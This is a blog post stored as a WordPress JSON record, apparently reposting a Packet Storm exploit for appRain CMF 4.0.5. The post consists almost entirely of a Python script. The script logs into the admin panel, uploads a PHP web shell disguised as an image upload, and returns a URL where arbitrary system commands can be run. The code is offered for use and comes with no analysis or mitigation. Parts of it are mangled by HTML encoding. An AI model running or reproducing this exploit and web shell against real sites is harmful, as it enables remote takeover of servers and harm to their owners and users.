{"id":57229,"date":"2024-06-03T18:49:39","date_gmt":"2024-06-03T15:49:39","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178895\/appraincmf405-shell.txt"},"modified":"2024-06-03T18:49:39","modified_gmt":"2024-06-03T15:49:39","slug":"apprain-cmf-4-0-5-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/apprain-cmf-4-0-5-shell-upload\/","title":{"rendered":"appRain CMF 4.0.5 Shell Upload"},"content":{"rendered":"<p># Exploit Title: appRain CMF 4.0.5 &#8211; Remote Code Execution (RCE) (Authenticated)<br \/># Date: 04\/28\/2024<br \/># Exploit Author: Ahmet \u00dcmit BAYRAM<br \/># Vendor Homepage: https:\/\/www.apprain.org<br \/># Software Link:<br \/>https:\/\/github.com\/apprain\/apprain\/archive\/refs\/tags\/v4.0.5.zip<br \/># Version: latest<br \/># Tested on: MacOS<\/p>\n<p>import requests<br \/>import sys<br \/>import time<br \/>import random<br \/>import string<\/p>\n<p>def generate_filename():<br \/>&#8220;&#8221;&#8221; Generate a 5-character random string for filename. 
&#8220;&#8221;&#8221;<br \/>return &#8221;.join(random.choices(string.ascii_lowercase, k=5)) + &#8220;.inc&#8221;<\/p>\n<p>def login(site, username, password):<br \/>print(&#8220;Logging in&#8230;&#8221;)<br \/>time.sleep(2)<br \/>login_url = f&#8221;https:\/\/{site}\/admin\/system&#8221;<br \/>session = requests.Session()<br \/>login_data = {<br \/>&#8216;data[Admin][admin_id]&#8217;: username,<br \/>&#8216;data[Admin][admin_password]&#8217;: password<br \/>}<br \/>headers = {<br \/>&#8216;Content-Type&#8217;: &#8216;application\/x-www-form-urlencoded&#8217;<br \/>}<br \/>response = session.post(login_url, data=login_data, headers=headers)<br \/>if &#8220;Logout&#8221; in response.text:<br \/>print(&#8220;Login Successful!&#8221;)<br \/>return session<br \/>else:<br \/>print(&#8220;Login Failed!&#8221;)<br \/>sys.exit()<\/p>\n<p>def upload_shell(session, site):<br \/>print(&#8220;Shell preparing&#8230;&#8221;)<br \/>time.sleep(2)<br \/>filename = generate_filename()<br \/>upload_url = f&#8221;https:\/\/{site}\/admin\/filemanager\/upload&#8221;<br \/>files = {<br \/>&#8216;data[filemanager][image]&#8217;: (filename, &#8220;&lt;html&gt;&lt;body&gt;&lt;form method=&#8217;GET&#8217;<br \/>name='&lt;?php echo basename($_SERVER[&#8216;PHP_SELF&#8217;]); ?&gt;&#8217;&gt;&lt;input type=&#8217;TEXT&#8217;<br \/>name=&#8217;cmd&#8217; autofocus id=&#8217;cmd&#8217; size=&#8217;80&#8217;&gt;&lt;input type=&#8217;SUBMIT&#8217;<br \/>value=&#8217;Execute&#8217;&gt;&lt;\/form&gt;&lt;pre&gt;&lt;?php if(isset($_GET[&#8216;cmd&#8217;])){<br \/>system($_GET[&#8216;cmd&#8217;]); } ?&gt;&lt;\/pre&gt;&lt;\/body&gt;&lt;\/html&gt;&#8221;, &#8216;image\/jpeg&#8217;)<br \/>}<br \/>data = {<br \/>&#8216;submit&#8217;: &#8216;Upload&#8217;<br \/>}<br \/>response = session.post(upload_url, files=files, data=data)<br \/>if response.status_code == 200 and &#8220;uploaded successfully&#8221; in response.text:<br \/>print(f&#8221;Your Shell is Ready: 
https:\/\/{site}\/uploads\/filemanager\/{filename}&#8221;)<br \/>else:<br \/>print(&#8220;Exploit Failed!&#8221;)<br \/>sys.exit()<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>print(&#8220;Exploiting&#8230;&#8221;)<br \/>time.sleep(2)<br \/>if len(sys.argv) != 4:<br \/>print(&#8220;Usage: python exploit.py sitename.com username password&#8221;)<br \/>sys.exit()<br \/>site = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = login(site, username, password)<br \/>upload_shell(session, site)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: appRain CMF 4.0.5 &#8211; Remote Code Execution (RCE) (Authenticated) # Date: 04\/28\/2024 # Exploit Author: Ahmet \u00dcmit BAYRAM # Vendor Homepage: https:\/\/www.apprain.org # Software Link: https:\/\/github.com\/apprain\/apprain\/archive\/refs\/tags\/v4.0.5.zip # Version: latest # Tested on: MacOS import requestsimport sysimport timeimport randomimport string def generate_filename():&#8220;&#8221;&#8221; Generate a 5-character random string for filename. 
&#8220;&#8221;&#8221;return &#8221;.join(random.choices(string.ascii_lowercase, k=5)) + &#8220;.inc&#8221; def login(site, username, password):print(&#8220;Logging in&#8230;&#8221;)time.sleep(2)login_url = &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57229","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57229","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57229"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57229\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57229"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57229"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57229"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}